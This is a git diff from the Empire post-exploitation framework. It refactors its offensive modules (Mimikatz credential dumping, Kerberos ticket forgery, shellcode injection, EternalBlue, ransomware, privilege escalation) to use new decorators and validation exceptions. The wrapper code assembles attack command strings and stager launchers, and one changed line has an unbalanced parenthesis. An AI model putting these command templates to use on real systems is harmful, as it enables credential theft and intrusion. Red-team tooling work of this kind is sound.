diff --git a/empire/server/modules/powershell/code_execution/invoke_ntsd.py b/empire/server/modules/powershell/code_execution/invoke_ntsd.py index 269ebfad2..17f3d2c71 100644 --- a/empire/server/modules/powershell/code_execution/invoke_ntsd.py +++ b/empire/server/modules/powershell/code_execution/invoke_ntsd.py @@ -1,16 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.exceptions import ModuleValidationException +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): listener_name = params["Listener"] upload_path = params["UploadPath"].strip() @@ -38,20 +42,10 @@ def generate( + "/data/module_source/code_execution/ntsdexts_x86.dll" ) - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) - script_end = "" if not main_menu.listenersv2.get_active_listener_by_name(listener_name): # not a valid listener, return nothing for the script - return handle_error_message("[!] Invalid listener: %s" % (listener_name)) + raise ModuleValidationException("Invalid listener: %s" % (listener_name)) else: multi_launcher = main_menu.stagertemplatesv2.new_instance("multi_launcher") multi_launcher.options["Listener"] = params["Listener"] @@ -64,7 +58,7 @@ def generate( launcher = multi_launcher.generate() if launcher == "": - return handle_error_message("[!] Error in launcher generation.") + raise ModuleValidationException("Error in launcher generation.") else: launcher = launcher.split(" ")[-1] @@ -94,10 +88,4 @@ def generate( script_end += "\r\n" script_end += code_exec - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py b/empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py index 6fb27e121..ac76f44e8 100644 --- a/empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py +++ b/empire/server/modules/powershell/code_execution/invoke_reflectivepeinjection.py @@ -2,31 +2,29 @@ from empire.server.common import helpers from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) script_end = "\nInvoke-ReflectivePEInjection" # check if file or PEUrl is set. Both are required params in their respective parameter sets. if params["File"] == "" and params["PEUrl"] == "": - return handle_error_message("[!] Please provide a PEUrl or File") + raise ModuleValidationException(("Please provide a PEUrl or File") for option, values in params.items(): if option.lower() != "agent": if option.lower() == "file": @@ -59,10 +57,4 @@ def generate( elif values and values != "": script_end += " -" + str(option) + " " + str(values) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/code_execution/invoke_shellcode.py b/empire/server/modules/powershell/code_execution/invoke_shellcode.py index fc2c7cb14..51630d5e1 100644 --- a/empire/server/modules/powershell/code_execution/invoke_shellcode.py +++ b/empire/server/modules/powershell/code_execution/invoke_shellcode.py @@ -2,23 +2,21 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) script_end = "\nInvoke-Shellcode -Force" @@ -42,10 +40,4 @@ def generate( script_end += "; 'Shellcode injected.'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/code_execution/invoke_shellcodemsil.py b/empire/server/modules/powershell/code_execution/invoke_shellcodemsil.py index 17fdd94da..dbc18a0c1 100644 --- a/empire/server/modules/powershell/code_execution/invoke_shellcodemsil.py +++ b/empire/server/modules/powershell/code_execution/invoke_shellcodemsil.py @@ -1,26 +1,19 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "Invoke-ShellcodeMSIL" @@ -35,10 +28,4 @@ def generate( sc = ",0".join(values.split("\\"))[1:] script_end += " -" + str(option) + " @(" + sc + ")" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/collection/screenshot.py b/empire/server/modules/powershell/collection/screenshot.py index 646b880bb..0b72d950e 100644 --- a/empire/server/modules/powershell/collection/screenshot.py +++ b/empire/server/modules/powershell/collection/screenshot.py @@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) if params["Ratio"]: if params["Ratio"] != "0": @@ -40,10 +34,4 @@ def generate( else: script_end += " -" + str(option) + " " + str(values) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/dcsync_hashdump.py b/empire/server/modules/powershell/credentials/mimikatz/dcsync_hashdump.py index b3bc8bd0e..0d938bde6 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/dcsync_hashdump.py +++ b/empire/server/modules/powershell/credentials/mimikatz/dcsync_hashdump.py @@ -1,26 +1,19 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "Invoke-DCSync -PWDumpFormat " @@ -39,10 +32,4 @@ def generate( outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf};" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py b/empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py index 83a166849..bf1fdd43c 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py +++ b/empire/server/modules/powershell/credentials/mimikatz/golden_ticket.py @@ -2,30 +2,25 @@ from empire.server.common.empire import MainMenu from empire.server.core.db.base import SessionLocal +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source log = logging.getLogger(__name__) class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) # if a credential ID is specified, try to parse cred_id = params["CredID"] @@ -34,10 +29,10 @@ def generate( cred = main_menu.credentialsv2.get_by_id(db, cred_id) if not cred: - return handle_error_message("[!] CredID is invalid!") + raise ModuleValidationException("CredID is invalid!") if cred.username != "krbtgt": - return handle_error_message("[!] A krbtgt account must be used") + raise ModuleValidationException("A krbtgt account must be used") if cred.domain != "": params["domain"] = cred.domain @@ -63,10 +58,4 @@ def generate( script_end += " /ptt\"'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/lsadump.py b/empire/server/modules/powershell/credentials/mimikatz/lsadump.py index 1eb2d4365..b503f09a0 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/lsadump.py +++ b/empire/server/modules/powershell/credentials/mimikatz/lsadump.py @@ -1,26 +1,19 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "Invoke-Mimikatz -Command " @@ -31,10 +24,4 @@ def generate( script_end += "\"';" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/mimitokens.py b/empire/server/modules/powershell/credentials/mimikatz/mimitokens.py index 01bbd01f2..ce8ded6f1 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/mimitokens.py +++ b/empire/server/modules/powershell/credentials/mimikatz/mimitokens.py @@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) list_tokens = params["list"] elevate = params["elevate"] @@ -40,8 +34,8 @@ def generate( elif elevate.lower() == "true": script_end += "'\"token::elevate" else: - return handle_error_message( - "[!] list, elevate, or revert must be specified!" + raise ModuleValidationException( + "list, elevate, or revert must be specified!" ) if domainadmin.lower() == "true": @@ -55,10 +49,4 @@ def generate( script_end += "\"';" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/pth.py b/empire/server/modules/powershell/credentials/mimikatz/pth.py index d7fda4c25..10e36ef3e 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/pth.py +++ b/empire/server/modules/powershell/credentials/mimikatz/pth.py @@ -2,30 +2,25 @@ from empire.server.common.empire import MainMenu from empire.server.core.db.base import SessionLocal +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source log = logging.getLogger(__name__) class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) # if a credential ID is specified, try to parse cred_id = params["CredID"] @@ -34,10 +29,10 @@ def generate( cred = main_menu.credentialsv2.get_by_id(db, cred_id) if not cred: - return handle_error_message("[!] CredID is invalid!") + raise ModuleValidationException("CredID is invalid!") if cred.credtype != "hash": - return handle_error_message("[!] An NTLM hash must be used!") + raise ModuleValidationException("An NTLM hash must be used!") if cred.username != "": params["user"] = cred.username @@ -61,10 +56,4 @@ def generate( ';"`nUse credentials/token to steal the token of the created PID."' ) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/silver_ticket.py b/empire/server/modules/powershell/credentials/mimikatz/silver_ticket.py index 7d9250ab8..c333b2529 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/silver_ticket.py +++ b/empire/server/modules/powershell/credentials/mimikatz/silver_ticket.py @@ -1,28 +1,22 @@ from empire.server.common import helpers from empire.server.common.empire import MainMenu from empire.server.core.db.base import SessionLocal +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) # if a credential ID is specified, try to parse cred_id = params["CredID"] @@ -31,10 +25,10 @@ def generate( cred = main_menu.credentialsv2.get_by_id(db, cred_id) if not cred: - return handle_error_message("[!] CredID is invalid!") + raise ModuleValidationException("CredID is invalid!") if not cred.username.endswith("$"): - return handle_error_message( + raise ModuleValidationException( "[!] please specify a machine account credential" ) if cred.domain != "": @@ -48,13 +42,13 @@ def generate( # error checking if not helpers.validate_ntlm(params["rc4"]): - return handle_error_message("[!] rc4/NTLM hash not specified") + raise ModuleValidationException("rc4/NTLM hash not specified") if params["target"] == "": - return handle_error_message("[!] target not specified") + raise ModuleValidationException("target not specified") if params["sid"] == "": - return handle_error_message("[!] domain SID not specified") + raise ModuleValidationException("domain SID not specified") # build the golden ticket command script_end = "Invoke-Mimikatz -Command '\"kerberos::golden" @@ -70,10 +64,4 @@ def generate( script_end += " /ptt\"'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/mimikatz/trust_keys.py b/empire/server/modules/powershell/credentials/mimikatz/trust_keys.py index a94c47fff..d1e8077e2 100644 --- a/empire/server/modules/powershell/credentials/mimikatz/trust_keys.py +++ b/empire/server/modules/powershell/credentials/mimikatz/trust_keys.py @@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "" if params["Method"].lower() == "sekurlsa": @@ -28,10 +22,4 @@ def generate( else: script_end += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/credentials/tokens.py b/empire/server/modules/powershell/credentials/tokens.py index 8e61487d2..381bf7cdf 100644 --- a/empire/server/modules/powershell/credentials/tokens.py +++ b/empire/server/modules/powershell/credentials/tokens.py @@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "Invoke-TokenManipulation" @@ -73,10 +67,4 @@ def generate( if params["RevToSelf"].lower() != "true": script_end += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"' - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/exfiltration/PSRansom.py b/empire/server/modules/powershell/exfiltration/PSRansom.py index 16fd0cbc0..31f83f96d 100644 --- a/empire/server/modules/powershell/exfiltration/PSRansom.py +++ b/empire/server/modules/powershell/exfiltration/PSRansom.py @@ -1,26 +1,19 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message - +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) if params["Mode"] == "Encrypt": args = f'$args = @(\'-e\', \'{params["Directory"]}\'' @@ -43,10 +36,5 @@ def generate( args += ")\n" script = args + script - script = main_menu.modulesv2.finalize_module( - script=script, - script_end="", - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) + return script diff --git a/empire/server/modules/powershell/exploitation/exploit_eternalblue.py b/empire/server/modules/powershell/exploitation/exploit_eternalblue.py index ddefe0337..1de063d5a 100755 --- a/empire/server/modules/powershell/exploitation/exploit_eternalblue.py +++ b/empire/server/modules/powershell/exploitation/exploit_eternalblue.py @@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) script_end = "\nInvoke-EternalBlue " @@ -34,10 +28,4 @@ def generate( script_end += "; 'Exploit complete'" - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/lateral_movement/inveigh_relay.py b/empire/server/modules/powershell/lateral_movement/inveigh_relay.py index 51e668d88..354653843 100644 --- a/empire/server/modules/powershell/lateral_movement/inveigh_relay.py +++ b/empire/server/modules/powershell/lateral_movement/inveigh_relay.py @@ -1,16 +1,20 @@ from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): # staging options listener_name = params["Listener"] @@ -21,20 +25,10 @@ def generate( launcher_obfuscate = params["Obfuscate"].lower() == "true" launcher_obfuscate_command = params["ObfuscateCommand"] - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) - if command == "": if not main_menu.listenersv2.get_active_listener_by_name(listener_name): # not a valid listener, return nothing for the script - return handle_error_message("[!] Invalid listener: " + listener_name) + raise ModuleValidationException("Invalid listener: " + listener_name) else: # generate the PowerShell one-liner with all of the proper options set @@ -52,7 +46,7 @@ def generate( # check if launcher errored out. If so return nothing if command == "": - return handle_error_message("[!] Error in launcher generation.") + raise ModuleValidationException("Error in launcher generation.") # set defaults for Empire script_end = "\n" + 'Invoke-InveighRelay -Tool "2" -Command \\"%s\\"' % ( @@ -82,10 +76,4 @@ def generate( else: script_end += " -" + str(option) + ' "' + str(values) + '"' - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py b/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py index 1a0d50dd8..1375ed760 100644 --- a/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py +++ b/empire/server/modules/powershell/privesc/bypassuac_tokenmanipulation.py @@ -3,33 +3,26 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): # options stager = params["Stager"] host = params["Host"] port = params["Port"] - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) - try: blank_command = "" powershell_command = "" @@ -56,10 +49,4 @@ def generate( encoded_cradle ) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/privesc/ms16-135.py b/empire/server/modules/powershell/privesc/ms16-135.py index 4ecb32746..865313640 100644 --- a/empire/server/modules/powershell/privesc/ms16-135.py +++ b/empire/server/modules/powershell/privesc/ms16-135.py @@ -1,26 +1,20 @@ from empire.server.common.empire import MainMenu from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) # generate the launcher code without base64 encoding listener_name = params["Listener"] @@ -43,10 +37,4 @@ def generate( script_end = 'Invoke-MS16135 -Command "' + launcher_code + '"' script_end += ';"`nInvoke-MS16135 completed."' - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/privesc/powerup/service_exe_stager.py b/empire/server/modules/powershell/privesc/powerup/service_exe_stager.py index 898a9d20c..cf5523428 100644 --- a/empire/server/modules/powershell/privesc/powerup/service_exe_stager.py +++ b/empire/server/modules/powershell/privesc/powerup/service_exe_stager.py @@ -1,26 +1,21 @@ from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) service_name = params["ServiceName"] @@ -50,7 +45,7 @@ def generate( script_end += '"Launcher bat written to $tempLoc `n";\n' if launcher_code == "": - return handle_error_message("[!] Error in launcher .bat generation.") + raise ModuleValidationException("Error in launcher .bat generation.") else: script_end += ( '\nInstall-ServiceBinary -ServiceName "' @@ -58,10 +53,4 @@ def generate( + '" -Command "C:\\Windows\\System32\\cmd.exe /C $tempLoc"' ) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py b/empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py index 6ab666931..ee45a4558 100644 --- a/empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py +++ b/empire/server/modules/powershell/privesc/powerup/write_dllhijacker.py @@ -1,16 +1,20 @@ from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_finalize, auto_get_source class Module: @staticmethod + @auto_get_source + @auto_finalize def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): # staging options launcher_obfuscate = params["Obfuscate"].lower() == "true" @@ -18,16 +22,6 @@ def generate( module_name = "Write-HijackDll" - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - - if err: - return handle_error_message(err) - script_end = ";" + module_name + " " # extract all of our options @@ -50,7 +44,7 @@ def generate( ) if launcher == "": - return handle_error_message("[!] Error in launcher command generation.") + raise ModuleValidationException("Error in launcher command generation.") else: out_file = params["DllPath"] @@ -58,6 +52,7 @@ def generate( script_end += " -DllPath %s" % (out_file) outputf = params.get("OutputFunction", "Out-String") + script_end += ( f" | {outputf} | " + '%{$_ + "`n"};"`n' @@ -65,10 +60,4 @@ def generate( + ' completed!"' ) - script = main_menu.modulesv2.finalize_module( - script=script, - script_end=script_end, - obfuscate=obfuscate, - obfuscation_command=obfuscation_command, - ) - return script + return script, script_end diff --git a/empire/server/modules/python/privesc/multi/CVE-2021-3560.py b/empire/server/modules/python/privesc/multi/CVE-2021-3560.py index 31d3b462f..bc441400b 100644 --- a/empire/server/modules/python/privesc/multi/CVE-2021-3560.py +++ b/empire/server/modules/python/privesc/multi/CVE-2021-3560.py @@ -1,31 +1,27 @@ import base64 from empire.server.common.empire import MainMenu +from empire.server.core.exceptions import ModuleValidationException from empire.server.core.module_models import EmpireModule -from empire.server.utils.module_util import handle_error_message +from empire.server.core.module_service import auto_get_source class Module: @staticmethod + @auto_get_source def generate( main_menu: MainMenu, module: EmpireModule, params: dict, obfuscate: bool = False, obfuscation_command: str = "", + script: str = "", ): # extract all of our options listener_name = params["Listener"] user_agent = params["UserAgent"] safe_checks = params["SafeChecks"] - # read in the common module source code - script, err = main_menu.modulesv2.get_module_source( - module_name=module.script_path, - obfuscate=obfuscate, - obfuscate_command=obfuscation_command, - ) - # generate the launcher code launcher = main_menu.stagers.generate_launcher( listener_name, @@ -35,7 +31,7 @@ def generate( ) if launcher == "": - return handle_error_message("[!] Error in launcher command generation.") + raise ModuleValidationException("Error in launcher command generation.") base64_launcher = base64.b64encode(launcher.encode("UTF-8")).decode("UTF-8") script = script.replace("{{ payload }}", base64_launcher)